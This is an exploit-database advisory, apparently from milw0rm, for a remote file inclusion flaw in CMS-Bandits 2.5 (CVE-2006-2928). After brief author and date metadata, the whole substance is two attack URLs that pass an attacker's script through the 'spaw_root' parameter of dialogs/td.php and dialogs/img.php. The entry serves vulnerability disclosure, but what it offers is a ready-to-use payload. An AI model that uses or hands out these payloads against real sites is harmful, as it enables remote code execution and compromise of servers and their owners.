CMS-Bandits 2.5 - 'spaw_root' Remote File Inclusion



EKU-ID: 9909 CVE: OSVDB-26242;CVE-2006-2928;OSVDB-26241 OSVDB-ID:
Author: Federico Fazzi Published: 2006-06-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]

# milw0rm.com [2006-06-08]